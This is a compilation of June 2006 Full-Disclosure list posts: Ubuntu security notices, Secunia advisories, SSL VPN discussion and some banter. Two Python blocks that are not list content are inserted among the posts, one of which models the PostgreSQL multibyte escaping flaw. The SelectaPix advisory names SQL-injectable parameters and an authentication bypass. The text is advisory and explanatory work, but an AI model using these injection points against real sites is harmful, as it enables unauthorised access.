I think SSL VPNs are a pretty lame idea in the first place, but for the
specific problem you bring up, would the following design work around
this?

Set up a wildcard record, *.webvpn.example.org, pointing to the device.
The device then maps all internal domain names or IP addresses to a
unique hostname, such as:  internalhost.webvpn.example.org, or
192-168-0-1.webvpn.example.org, etc.

Wouldn't this properly segment different internal sites, such that an
XSS in one wouldn't impact the other?  If so, pay attention all SSL VPN
vendors: it is your free idea for the week.

tim


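Tim's per-host mapping and the domain-cookie caveat Brian raises, as an added Python model that is not any vendor's or poster's code: the label scheme for mapped names, the Cookie class and the RFC 6265 matching rules are the model's own, and the Set-Cookie values used in the demo are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# The wildcard zone from the thread: *.webvpn.example.org resolves to the device.
WEBVPN_ZONE = "webvpn.example.org"


def map_internal_host(target: str) -> str:
    """Give every internal host its own name under the wildcard record.

    Dots (and IPv6 colons) become hyphens, so 192.168.0.1 maps to
    192-168-0-1.webvpn.example.org; the label scheme is this model's
    assumption, the thread only gives the two examples."""
    try:
        label = str(ipaddress.ip_address(target)).replace(".", "-").replace(":", "-")
    except ValueError:
        label = target.lower().rstrip(".").replace(".", "-")
    return f"{label}.{WEBVPN_ZONE}"


@dataclass(frozen=True)
class Cookie:
    name: str
    value: str
    set_on_host: str               # the mapped host whose response set it
    domain: Optional[str] = None   # None: host-only cookie (RFC 6265)
    path: str = "/"


def parse_set_cookie(header_value: str, set_on_host: str) -> Cookie:
    """Minimal Set-Cookie parser: name=value, then ;-separated attributes."""
    nv, *attrs = [p.strip() for p in header_value.split(";")]
    name, _, value = nv.partition("=")
    domain, path = None, "/"
    for attr in attrs:
        key, _, val = attr.partition("=")
        if key.lower() == "domain" and val:
            domain = val.lower().lstrip(".")
        elif key.lower() == "path" and val.startswith("/"):
            path = val
    return Cookie(name, value, set_on_host.lower(), domain, path)


def rewrite_set_cookie(header_value: str) -> str:
    """What the device should do before relaying a backend's Set-Cookie:
    drop any Domain attribute so the browser stores the cookie host-only
    for the mapped host it came from.  A Domain=webvpn.example.org cookie
    (the SSO shortcut) would otherwise reach every mapped host."""
    parts = [p.strip() for p in header_value.split(";")]
    return "; ".join(p for p in parts if not p.lower().startswith("domain="))


def cookie_sent_to(cookie: Cookie, host: str, path: str = "/") -> bool:
    """RFC 6265 matching: host-only cookies go only to the host that set
    them, domain cookies to that domain and every subdomain; Path is a
    prefix match on the request path, not a security boundary."""
    host = host.lower()
    if cookie.domain is None:
        host_ok = host == cookie.set_on_host
    else:
        host_ok = host == cookie.domain or host.endswith("." + cookie.domain)
    prefix = cookie.path.rstrip("/") + "/"
    path_ok = path == cookie.path or path.startswith(prefix)
    return host_ok and path_ok


def isolation_report(mapped_hosts: Iterable[str],
                     cookies: Iterable[Cookie]) -> Dict[str, List[str]]:
    """For each mapped host, the cookie names a browser would attach."""
    cookies = list(cookies)
    return {h: sorted(c.name for c in cookies if cookie_sent_to(c, h))
            for h in mapped_hosts}


if __name__ == "__main__":
    app1, app2 = map_internal_host("app1"), map_internal_host("app2")
    # Constructed backend responses: one per-app session, one SSO domain cookie.
    session = parse_set_cookie(rewrite_set_cookie(
        "session=abc; Domain=webvpn.example.org; Path=/; HttpOnly"), app1)
    sso = parse_set_cookie("sso=tok; Domain=webvpn.example.org", app1)
    print(isolation_report([app1, app2], [session, sso]))
```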

Re: [Full-disclosure] Is your security 6/6/6 ready?

2006-06-09 Thread womber

I am wondering if NetDev is the same guy who claimed he was going to
summon a UFO to Vegas last year. Or at the least that Crossover guy.
I see a computer, Keys, disks, code.
I see a hole, a leak, a hack, a 0-day.



Re: [Full-disclosure] Want to test this desktop barrier? (Unauthorized offer) 0day protection

2006-06-09 Thread neil davis
chroot for windows :P
good stuff.
On Thu, 2006-06-08 at 10:14 -0700, Bill Stout wrote:
> 
>34422VS279429422K44W



[Full-disclosure] [USN-296-1] firefox vulnerabilities

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-296-1  June 09, 2006
firefox vulnerabilities
CVE-2006-2775, CVE-2006-2776, CVE-2006-2777, CVE-2006-2778,
CVE-2006-2779, CVE-2006-2780, CVE-2006-2782, CVE-2006-2783,
CVE-2006-2784, CVE-2006-2785, CVE-2006-2786, CVE-2006-2787,
CVE-2006-2788
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox   1.5.dfsg+1.5.0.4-0ubuntu6.06

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Please note that Firefox 1.0.8 in Ubuntu 5.10 and Ubuntu 5.04 is also
affected by these problems. Updates for these Ubuntu releases will be
delayed because upstream has dropped support for this Firefox version.
If you use one of these Ubuntu versions, we strongly advise that you
disable JavaScript, which removes the attack vector for most of these
vulnerabilities.

Details follow:

Jonas Sicking discovered that under some circumstances persisted XUL
attributes are associated with the wrong URL. A malicious web site
could exploit this to execute arbitrary code with the privileges of
the user. (MFSA 2006-35, CVE-2006-2775)

Paul Nickerson discovered that content-defined setters on an object
prototype were getting called by privileged UI code. It was
demonstrated that this could be exploited to run arbitrary web script
with full user privileges (MFSA 2006-37, CVE-2006-2776). A similar
attack was discovered by moz_bug_r_a4 that leveraged SelectionObject
notifications that were called in privileged context. (MFSA 2006-43,
CVE-2006-2777)

Mikolaj Habryn discovered a buffer overflow in the crypto.signText()
function. By tricking a user to visit a site with an SSL certificate
with specially crafted optional Certificate Authority name
arguments, this could potentially be exploited to execute arbitrary
code with the user's privileges. (MFSA 2006-38, CVE-2006-2778)

The Mozilla developer team discovered several bugs that lead to
crashes with memory corruption. These might be exploitable by
malicious web sites to execute arbitrary code with the privileges of
the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780, CVE-2006-2788)

Chuck McAuley reported that the fix for CVE-2006-1729 (file stealing
by changing input type) was not sufficient to prevent all variants of
exploitation. (MFSA 2006-41, CVE-2006-2782)

Masatoshi Kimura found a way to bypass web input sanitizers which
filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)'
characters into the HTML code (e. g. ''), these filters
might not recognize the tags anymore; however, Firefox would still
execute them since BOM markers are filtered out before processing the
page. (MFSA 2006-42, CVE-2006-2783)

Paul Nickerson noticed that the fix for CVE-2005-0752 (JavaScript
privilege escalation on the plugins page) was not sufficient to
prevent all variants of exploitation. (MFSA 2006-36, CVE-2006-2784)

Paul Nickerson demonstrated that if an attacker could convince a user
to right-click on a broken image and choose "View Image" from the
context menu then he could get JavaScript to run on a site of the
attacker's choosing. This could be used to steal login cookies or
other confidential information from the target site. (MFSA 2006-34,
CVE-2006-2785)

Kazuho Oku discovered various ways to perform HTTP response smuggling
when Firefox is used with certain proxy servers. Because Firefox and
the proxy server interpret nonstandard HTTP headers differently, a
malicious web site can exploit this to send back two responses to one
request. The second response could be used to steal login cookies or
other sensitive data from another opened web site. (MFSA 2006-33,
CVE-2006-2786)


Updated packages for Ubuntu 6.06 LTS:


Re: [Full-disclosure] Windows Software Restriction Policy Protection Bypass

2006-06-09 Thread Dinis Cruz

This MS answer speaks volumes to their approach to security (I had
similar made to me in the past)


09.06.06 - Vendor response

"Software Restriction Policy and Group Policy are not meant to be
complete security features...For full security, we recommend using ACLs
to protect the appropriate resources in your environment..."


Maybe they should update some of their docs:


From 
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/rstrplcy.mspx


"...Software restriction policies are a new feature in Microsoft(r)
Windows(r) XP and Windows Server 2003. This important feature provides
administrators with a policy-driven mechanism for identifying software
programs running on computers in a domain, and controls the ability of
those programs to execute. Software restriction policies can improve
system integrity and manageability—which ultimately lowers the cost of
owning a computer..."

"...Software restriction policies are a part of Microsoft's security
and management strategy to assist enterprises in increasing the
reliability, integrity, and manageability of their computers. Software
restriction policies are one of many new management features in
Windows XP and Windows Server 2003.

This article provides an in-depth look at how software restriction
policies can be used to: Fight viruses, Regulate which ActiveX controls
can be downloaded, Run only digitally signed scripts, Enforce that only
approved software is installed on system computers, Lockdown a
machine..."


From 
http://www.microsoft.com/technet/security/prodtech/windowsxp/secwinxp/xpsgch06.mspx


"...Software restriction policy provides administrators with a way to
identify software and control its ability to run on local computers.
This tool can help protect computers that run Microsoft(r) Windows(r)
XP Professional against known conflicts and safeguard them against
malicious software such as viruses and Trojan horse programs. Software
restriction policy integrates fully with the Active Directory(r)
directory service and Group Policy. You can also use it on stand-alone
computers"

Dinis Cruz
Owasp .Net Project



[Full-disclosure] [USN-295-1] xine-lib vulnerability

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-295-1  June 09, 2006
xine-lib vulnerability
CVE-2006-2802
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libxine1   1.0-1ubuntu3.7

Ubuntu 5.10:
  libxine1c2 1.0.1-1ubuntu10.3

Ubuntu 6.06 LTS:
  libxine-main1  1.1.1+ubuntu2-7.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.
XXX OR XXX
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input
module. By tricking a user into opening a malicious remote media
location, a remote attacker could exploit this to crash Xine library
frontends (like totem-xine, gxine, or xine-ui) and possibly even
execute arbitrary code with the user's privileges.


Updated packages for Ubuntu 5.04, Ubuntu 5.10 and Ubuntu 6.06 LTS:

[Full-disclosure] [USN-294-1] courier vulnerability

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-294-1  June 09, 2006
courier vulnerability
CVE-2006-2659
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  courier-mta   0.47-3ubuntu1.5

Ubuntu 5.10:
  courier-mta   0.47-3ubuntu7.2

Ubuntu 6.06 LTS:
  courier-mta   0.47-13ubuntu5.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

A Denial of Service vulnerability has been found in the function for
encoding email addresses. Addresses containing a '=' before the '@'
character caused Courier to hang in an endless loop, rendering the
service unusable.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47-3ubuntu1.5.diff.gz
  Size/MD5:   108704 54427ae8946f3393309424c67b434294

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47-3ubuntu1.5.dsc
  Size/MD5: 1204 0740cd77bb282a9a6446b0ce0de80419

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47.orig.tar.gz
  Size/MD5:  6350808 361a84e497148ce557c150d3576ec24b

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-doc_0.47-3ubuntu1.5_all.deb
  Size/MD5:   370652 20507345daea36580119b02989159a76

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-authdaemon_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:62548 d157fe17cf5bc242082644b0e19434e4

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authmysql_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:57162 9a7094e1805c06a0c5e592a003f4dd30

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authpostgresql_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:57350 4a586bac446463116f8a752df108d3b2

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-base_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   257282 659d6931e7f25352b88a6bffa1be6bba

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-faxmail_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:28864 38b62157bdbca607c2db3d1866db4cd5

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-imap-ssl_3.0.8-3ubuntu1.5_amd64.deb
  Size/MD5:21404 b9a740d1a5e4a366449711cb8472a291

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-imap_3.0.8-3ubuntu1.5_amd64.deb
  Size/MD5:   950548 c1ae151418e74a11af6930f9b733a5f9

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-ldap_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:74292 d67ac6f6e8df175cc1eb877a766d9f10

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-maildrop_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   942804 23c26b6c2f9d69a3baaf77bc9f8cf5c7

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mlm_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   122864 b72a7fe87d9458ec172fabe33cb0aa0f

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mta-ssl_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:19486 2f0fc3d9f7ddd934d0224ab7085cac9a

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mta_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:  2157504 6a4f4624f1b01e3c2b4a11ed45370b44

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-pcp_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:6 7b8e381af3f0ec2a0d92895e3e7079cb

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-pop-ssl_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:21202 80c2075c5f9eff0e42d58cd05c5fae3a

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-pop_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   423242 217a9fcf78949204f8666e3d1ad0d179

http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-ssl_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   195810 82539a6e475e5d83652274e6b4379d0e

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-webadmin_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:34538 8d78c981468e57c927f593f0b1580c4e

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/sqwebmail_0.47-3ubuntu1.5_amd64.deb
  Size/MD5:   798170 3ac5a00717db529f057ce0da2cefa0ca

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-authdaemon_0.47-3ubuntu1.5_i386.deb
  Size/MD5:56302 d74f86a962af5e41b3248cbb02f5dbbf

http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authmysql_0.47-3ubuntu1.5_i386.deb
  Size/MD5:52212 f550c361

[Full-disclosure] [USN-288-3] PostgreSQL client vulnerabilities

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-288-3  June 09, 2006
dovecot, exim4, postfix vulnerabilities
CVE-2006-2314, CVE-2006-2753
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  dovecot-common 0.99.13-3ubuntu0.1
  exim4-daemon-heavy 4.34-10ubuntu0.1
  postfix-pgsql  2.1.5-9ubuntu3.1

Ubuntu 5.10:
  dovecot-common 0.99.14-1ubuntu1.1
  exim4-daemon-heavy 4.52-1ubuntu0.1
  postfix-pgsql  2.2.4-1ubuntu2.1

Ubuntu 6.06 LTS:
  dovecot-common 1.0.beta3-3ubuntu5.1
  exim4-daemon-heavy 4.60-3ubuntu3.1
  postfix-pgsql  2.2.10-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-288-1 described a PostgreSQL client vulnerability in the way 
the >>'<< character is escaped in SQL queries. It was determined that
the PostgreSQL backends of Exim, Dovecot, and Postfix used this unsafe
escaping method.

For reference, these are the details of the original USN:

  CVE-2006-2313:
Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of
invalidly-encoded multibyte text data. If a client application
processed untrusted input without respecting its encoding and applied
standard string escaping techniques (such as replacing a single quote
>>'<< with >>\'<< or >>''<<), the PostgreSQL server could interpret the
resulting string in a way that allowed an attacker to inject arbitrary
SQL commands into the resulting SQL query. The PostgreSQL server has
been modified to reject such invalidly encoded strings now, which
completely fixes the problem for some 'safe' multibyte encodings like
UTF-8.

  CVE-2006-2314:
However, there are some less popular and client-only multibyte
encodings (such as SJIS, BIG5, GBK, GB18030, and UHC) which contain
valid multibyte characters that end with the byte 0x5c, which is the
representation of the backslash character >>\<< in ASCII. Many client
libraries and applications use the non-standard, but popular way of
escaping the >>'<< character by replacing all occurrences of it with
>>\'<<. If a client application uses one of the affected encodings and
does not interpret multibyte characters, and an attacker supplies a
specially crafted byte sequence as an input string parameter, this
escaping method would then produce a validly-encoded character and
an excess >>'<< character which would end the string. All subsequent
characters would then be interpreted as SQL code, so the attacker
could execute arbitrary SQL commands.

To fix this vulnerability end-to-end, client-side applications must
be fixed to properly interpret multibyte encodings and use >>''<<
instead of >>\'<<. However, as a precautionary measure, the sequence
>>\'<< is now regarded as invalid when one of the affected client
encodings is in use. If you depend on the previous behaviour, you
can restore it by setting 'backslash_quote = on' in postgresql.conf.
However, please be aware that this could render you vulnerable
again.

This issue does not affect you if you only use single-byte (like
SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like
UTF-8) encodings.

  Please see http://www.postgresql.org/docs/techdocs.50 for further
  details.

Updated packages for Ubuntu 5.04:

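The escaping flaw described in the details of this USN, as an added example that is not part of the advisory, of PostgreSQL, or of the affected mail servers: a model of what the server sees when a client escapes ' as \' on raw bytes versus decoding the input first and doubling quotes. The Shift_JIS bytes, the simplified literal parser and the helper names are constructed for the demonstration.

```python
"""Model of the CVE-2006-2314 escaping flaw described in USN-288-3.

Constructed demonstration, not code from the advisory, from PostgreSQL or
from the affected mail servers. It compares a client that escapes ' as \\'
on raw bytes without understanding the connection encoding with one that
decodes first and doubles quotes. Shift_JIS is used because its trailing
bytes may be 0x5c (the ASCII backslash); 0x83 is a Shift_JIS lead byte and
0x83 0x5c is the katakana character "ソ".
"""

ENCODING = "shift_jis"


def escape_bytewise_backslash(raw: bytes) -> bytes:
    """Unsafe: byte-level replacement of ' with \\', encoding-unaware."""
    return raw.replace(b"'", b"\\'")


def is_valid_input(raw: bytes, encoding: str = ENCODING) -> bool:
    """Strict decode; a lone lead byte such as 0x83 is rejected here."""
    try:
        raw.decode(encoding)
    except UnicodeDecodeError:
        return False
    return True


def escape_quote_doubling(raw: bytes, encoding: str = ENCODING) -> str:
    """Safe: decode strictly (raises on invalid sequences), then use ''."""
    return raw.decode(encoding).replace("'", "''")


def parse_literal(body: str, backslash_quote: bool = True):
    """Model how a server reads the text that follows an opening quote.

    Simplified: '' yields a quote; \\' also does when backslash_quote is on
    (the pre-fix default) and is an error when it is off (the updated
    default for affected encodings); a bare ' closes the literal. Other
    backslash escapes are not modelled. Returns (value, remainder), where
    remainder is everything after the closing quote, i.e. text the server
    would treat as SQL rather than as string data.
    """
    out, i = [], 0
    while i < len(body):
        c = body[i]
        if c == "\\" and body[i + 1 : i + 2] == "'":
            if not backslash_quote:
                raise ValueError("backslash-quote rejected for this encoding")
            out.append("'")
            i += 2
            continue
        if c == "'":
            if body[i + 1 : i + 2] == "'":
                out.append("'")
                i += 2
                continue
            return "".join(out), body[i + 1 :]
        out.append(c)
        i += 1
    raise ValueError("unterminated string literal")


def server_view_unsafe(raw: bytes, backslash_quote: bool = True):
    """Legacy client: quote the bytewise-escaped bytes; server decodes them."""
    query = b"'" + escape_bytewise_backslash(raw) + b"'"
    return parse_literal(query.decode(ENCODING)[1:], backslash_quote)


def server_view_safe(raw: bytes, backslash_quote: bool = True):
    """Fixed client: decode, double quotes, then wrap the text in quotes."""
    query = "'" + escape_quote_doubling(raw) + "'"
    return parse_literal(query[1:], backslash_quote)


def legacy_client_breaks_loudly(raw: bytes) -> bool:
    """With the server-side precaution on, a legacy \\' client gets an error
    for legitimate input instead of silently working; note that this alone
    does not catch the lone-lead-byte case, which is why the advisory says
    clients must be fixed end-to-end."""
    try:
        server_view_unsafe(raw, backslash_quote=False)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    good = "ソ' extra".encode(ENCODING)  # valid: 0x83 0x5c, then a quote
    bad = b"\x83' extra"                 # constructed: lone lead byte, then a quote
    print("unsafe escaper, valid input:  ", server_view_unsafe(good))
    print("unsafe escaper, invalid input:", server_view_unsafe(bad))
    print("safe escaper, valid input:    ", server_view_safe(good))
    print("safe escaper accepts invalid? ", is_valid_input(bad))
```

For the invalid input the remainder is non-empty: the escaper's backslash was absorbed into a valid two-byte character and the quote it was meant to escape closed the literal early.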

[Full-disclosure] [USN-292-1] binutils vulnerability

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-292-1  June 09, 2006
binutils vulnerability
CVE-2006-2362
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  binutils   2.15-5ubuntu2.3
  binutils-dev   2.15-5ubuntu2.3

Ubuntu 5.10:
  binutils   2.16.1-2ubuntu6.1
  binutils-dev   2.16.1-2ubuntu6.1

Ubuntu 6.06 LTS:
  binutils   2.16.1cvs20060117-1ubuntu2.1
  binutils-dev   2.16.1cvs20060117-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

CVE-2006-2362

Jesus Olmos Gonzalez discovered a buffer overflow in the Tektronix Hex
Format (TekHex) backend of the BFD library, such as used by the
'strings' utility. By tricking a user or automated system into
processing a specially crafted file with 'strings' or a vulnerable
third-party application using the BFD library, this could be exploited
to crash the application, or possibly even execute arbitrary code with
the privileges of the user.

Updated packages for Ubuntu 5.04:

Updated packages for Ubuntu 5.10:


[Full-disclosure] [USN-293-1] gdm vulnerability

2006-06-09 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-293-1  June 09, 2006
gdm vulnerability
CVE-2006-2452
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  gdm2.8.0.5-0ubuntu1.2

Ubuntu 6.06 LTS:
  gdm2.14.6-0ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

If the admin configured a gdm theme that provided a user list, any
user could activate the gdm setup program by first choosing the setup
option from the menu, clicking on the user list and entering his own
(instead of root's) password. This allowed normal users to configure
potentially dangerous features like remote or automatic login.

Please note that this does not affect a default Ubuntu installation,
since the default theme does not provide a user list. In Ubuntu 6.06
you additionally have to have the "ConfigAvailable" setting enabled in
gdm.conf to be vulnerable (it is disabled by default).

Ubuntu 5.04 is not affected by this flaw.


Updated packages for Ubuntu 5.10:

Updated packages for Ubuntu 6.06 LTS:




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Separate Debian from Full Disclosure

2006-06-09 Thread sudo su

u d0 realize th4t u r g4y
deb1an iz a well kn0wn whitehat diztr0, we do not require deb1anz
presence in teh non dizclosure society and theze forums is where u 4ll
rally your gay whitehat dizcussionz.
s0 mr afghan m4n stfu kthx or face the concequencez

On 6/9/06, ßµªSKãR  †|wãri <[EMAIL PROTECTED]> wrote:

Hi all

Here is a request to please do not merge Debian Mailing List's Mails with
Full Disclosure

--
\
ßµªSKãR  †|wãri






[Full-disclosure] Separate Debian from Full Disclosure

2006-06-09 Thread ßµªSKãR †|wãri
Hi all

Here is a request to please do not merge Debian Mailing List's Mails with
Full Disclosure

--
\
ßµªSKãR  †|wãri

[Full-disclosure] RSBAC 1.2.7 Released

2006-06-09 Thread kang

The RSBAC team is happy to announce that RSBAC 1.2.7 has just been
released for both kernels 2.4.32 and 2.6.16.

This is the latest stable version. There is no special upgrade path if
you were using 1.2.6 or 1.2.5. Simply compile, install the new admin
tools and the new kernel.

This is a short release since 1.2.6 that fixes a few remaining issues.

Changes since 1.2.6:

  * Fix rsbac-admin debian Changelog
  * Fix 2.4 pax flags location
  * Fix 1.2.6 patches issues (non-RSBAC code)

Changes since 1.2.5:

  * New kthread notification code
  * rsbac_login behaving now more like pam login
  * GCC-4 compatibility fixes
  * Change FF to allow file READ (but not READ_OPEN) even with
execute_only
  * Caches infected scan results on read/open/close instead of rescan
  * xstats now include GROUP targets
  * Debian package fixes


Patches and prepatched kernels are available at this location:

http://rsbac.org/download#current_version1.2.7



[Full-disclosure] RE: Want to test this desktop barrier? (Unauthorized offer) > 0day protection (Bill Stout)

2006-06-09 Thread Chavoux Luyt

Hi

Message: 14
Date: Thu, 8 Jun 2006 18:07:27 -0700
From: "Bill Stout" <[EMAIL PROTECTED]>
Subject: RE: [Full-disclosure] Want to test this desktop barrier?
(Unauthorized offer) 0day protection

> It is conceptually different than AV or AS products, which is why I fall
> back to analogies.  Even experienced security folk automatically categorize
> something new with existing products, and presuppose there is nothing new
> under the sun.


My first reaction on reading the article was that finally Windows
users can get something that resembles what is built-in to
Unix/Linux/MacOSX... the ability to separate user space from
root/administrator/system. Does Winpooch do the same?

Regards
Chavoux



[Full-disclosure] Re: SSL VPNs and security

2006-06-09 Thread wnorth
Very good information, we use F5 firepass products and I could see the same 
issue inherent in your statements. The benefits to the business, from a cost 
perspective, are many, no need for tokens unless you are doing 2-factor auth, 
which I encourage as it will check your personal PIN against your AD account to 
ensure you are, who you say you are. Without 2-factor, it's a lost cause.

Thoughts?



[Full-disclosure] Secunia Research: AutoMate unacev2.dll Buffer Overflow Vulnerability

2006-06-09 Thread Secunia Research
== 

Secunia Research 07/06/2006

   - AutoMate unacev2.dll Buffer Overflow Vulnerability -

== 
Table of Contents

Affected Software ........................................... 1
Severity .................................................... 2
Description of Vulnerability ................................ 3
Solution .................................................... 4
Time Table .................................................. 5
Credits ..................................................... 6
References .................................................. 7
About Secunia ............................................... 8
Verification ................................................ 9

== 
1) Affected Software 

* AutoMate version 6.1.0.0

Other versions may also be affected.

== 
2) Severity 

Rating: Less Critical
Impact: System Access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AutoMate, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL 
when extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

Successful exploitation requires that the user is e.g. tricked into
scheduling a task to extract a malicious ACE archive.

== 
4) Solution 

The vendor reportedly released a fix on 2006-05-29.

Do not extract untrusted ACE archives.

== 
5) Time Table 

02/05/2006 - Initial vendor notification.
09/05/2006 - Initial vendor reply.
16/05/2006 - Vendor reminder.
16/05/2006 - Vendor reply.
30/05/2006 - Vendor reminder.
07/06/2006 - Public disclosure. (No reply from vendor)

== 
6) Credits 

Discovered by Secunia Research.

== 
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-38/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] Secunia Research: SelectaPix Cross-Site Scripting and SQL Injection Vulnerabilities

2006-06-09 Thread Secunia Research
==

 Secunia Research 09/06/2006

 - SelectaPix Cross-Site Scripting and SQL Injection Vulnerabilities -

==
Table of Contents

Affected Software ........................................... 1
Severity .................................................... 2
Vendor's Description of Software ............................ 3
Description of Vulnerabilities .............................. 4
Solution .................................................... 5
Time Table .................................................. 6
Credits ..................................................... 7
References .................................................. 8
About Secunia ............................................... 9
Verification ............................................... 10

==
1) Affected Software

* SelectaPix 1.31

Prior versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Manipulation of data and cross-site scripting
Where:  Remote

==
3) Vendor's Description of Software

SelectaPix is a free (GPL Licence), highly configurable PHP/MySQL 
image gallery system which can be integrated into your existing site 
in minutes. The password-protected admin section allows you to upload 
up to 10 jpeg images in one go, and arrange them into albums and 
sub-albums.

Product link:
http://www.outofthetrees.co.uk/selectapix/index.php

==
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in SelectaPix, 
which can be exploited by malicious people to conduct 
cross-site scripting and SQL injection attacks.

1) Some input is not properly sanitised before being used in a SQL 
query. This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

Examples:
http://[host]/view_album.php?albumID=[code]
http://[host]/popup.php?albumID=2&imageID=[code]
http://[host]/index.php?albumID=[code]
* The "username" and "passwd" parameters passed in "admin/member.php".

This can further be exploited to bypass the authentication process and 
access the administration section.

Successful exploitation requires that "magic_quotes_gpc" is disabled 
(except for the "albumID" parameter).

